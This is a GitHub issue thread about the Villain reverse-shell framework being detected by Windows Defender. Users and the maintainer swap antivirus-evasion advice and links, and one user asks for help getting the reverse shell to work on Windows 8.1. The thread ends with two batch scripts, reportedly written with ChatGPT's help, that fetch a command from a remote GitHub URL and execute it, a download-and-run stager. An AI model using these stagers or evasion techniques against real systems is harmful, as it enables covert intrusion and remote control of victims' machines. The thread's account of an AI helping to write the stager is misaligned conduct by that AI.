Villain gets detected by windows defender

[edikiuspy]

I used obfuscate option but still got detected.

[keralahacker]

Using obfuscate option getting detected

[anonyvietofficial]

same issus

[t3l3machus]

I made a small update in the payload templates and it seems to do the trick again (for now). You should not expect this to last forever (by this or any other tool), the obfuscate function is there to assist you, not to do the job for you.

I will try to update the templates and improve the general functionality of Villain in time but there will be ups and downs, it's inevitable. I encourage you to look into AV evasion techniques both manually and by using automated tools, you can start by checking this repo out -> https://github.com/sinfulz/JustEvadeBro or some of the videos I've made.

[t3l3machus]

I am intentionally leaving this open indefinitely.

[edikiuspy]

@t3l3machus unfortunately with new windows defender update same issue again

[gaalos]

You might "cypher" de string unsing key ?

[t3l3machus]

I made a video to give you ideas on how to bypass detection. I can update the templates or the auto-obf function but it's not worth it. https://www.youtube.com/watch?v=FVbdZSGkzhs

[edikiuspy]

Thank you for response. Your tool is very useful and great work!

[t3l3machus]

@edikiuspy thank you :))

[gaalos]

@t3l3machus Nicely done for your explain. Maybe you can use : in your can obfuscate it by changing variable names. Add OR AND conditions automaticly ? :) The goal here is to not touch the payload generated ;)

[t3l3machus]

@gaalos That was the goal at the beginning. It doesn't matter how complicated i make it, it will just keep getting flagged and at some point the payload will be burned. I have tried many other tricks (including various string operations, adding logical operators here and there, it doesn't work).

[gaalos]

@t3l3machus yes it's true ^^. Maybe create payload without powershell as binary file ?

[t3l3machus]

@gaalos yeah i have already done it! I will update soon with an additional windows cmd payload template

[gaalos]

@t3l3machus Thx for your work ! Your code make me happy ton explain somes risk to my students :=)

[rikda]

detected by AV

[dmcxblue]

@rikda It will eventually get detected, you need to apply your own magic to bypass.

[aksrivastava]

if you want to bypass defender please try these techniques

https://youtu.be/EZOW40S_cTM

[gaalos]

@t3l3machus when did you do the update about "

Maybe create payload without powershell as binary file ?

Hey @t3l3machus when did you update it with binary payload ? :p

[t3l3machus]

@gaalos haven;t done such update and don't intent to. Other things are in order for Villain (after i release a new tool probably next Monday) :)

[Envincion]

@gaalos haven;t done such update and don't intent to. Other things are in order for Villain (after i release a new tool probably next Monday) :)

For me its still working like a charm ,but im wondring if there's a way to fix the payload to be able to work on OS Windows 8.1 ,it giving me this

[aksrivastava]

convert your PowerShell script into EXE in 2 seconds watch the video - https://youtube.com/shorts/1uxvjBPqu7I?feature=share

[Envincion]

convert your PowerShell script into EXE in 2 seconds watch the video - https://youtube.com/shorts/1uxvjBPqu7I?feature=share

Thank you for your replay, but unfortunately converting ps to exe doesn't help to get the reverse shell working it works on widows 10 - 11 - server 2018 , but not ( Windows 8.1 )

[gaalos]

convert your PowerShell script into EXE in 2 seconds watch the video - https://youtube.com/shorts/1uxvjBPqu7I?feature=share

not working because it's just executing script, not a real BINARY/EXE File :)

[UdayA6796]

Does someone have the older version of villain? if yes can you guys send the file here pls

[F0rW0rk1]

The last version of Villain still gets detected by windows defender. The obfustacte function doesn't work for the netcat templates, i got this error "Ignoring unsupported arguments: OBFUSCATE" and add the obfuscate attrinut doesn't work either. Does someone how i can make this work ?

[gaalos]

Hey all i use something like curl to ... and it's work Thx to chatGPT

run.bat ` @echo off

REM Remplacez l'URL par celle que vous souhaitez appeler set "url=https://raw.githubusercontent.com/gaalos/dontdo/main/run-http"

REM Effectue la requête curl à partir de l'URL et stocke la sortie dans une variable for /f "usebackq delims=" %%i in (curl %url%) do set "curl_output=%%i"

REM Exécute la sortie de la variable comme une commande cmd /k %curl_output%

REM Terminer le script exit `

or ` @echo off

REM Remplacez l'URL par celle que vous souhaitez appeler set "url=https://raw.githubusercontent.com/gaalos/dontdo/main/run"

REM Effectue la requête curl à partir de l'URL et stocke la sortie dans une variable for /f "usebackq delims=" %%i in (curl %url%) do set "curl_output=%%i"

REM Exécute la sortie de la variable comme une commande start /B cmd /k %curl_output%

REM Terminer le script exit `

@t3l3machus Maybe you can try to create cmd/powreshell base on curl call ? Obviously the "victim" need to get grant access to the external url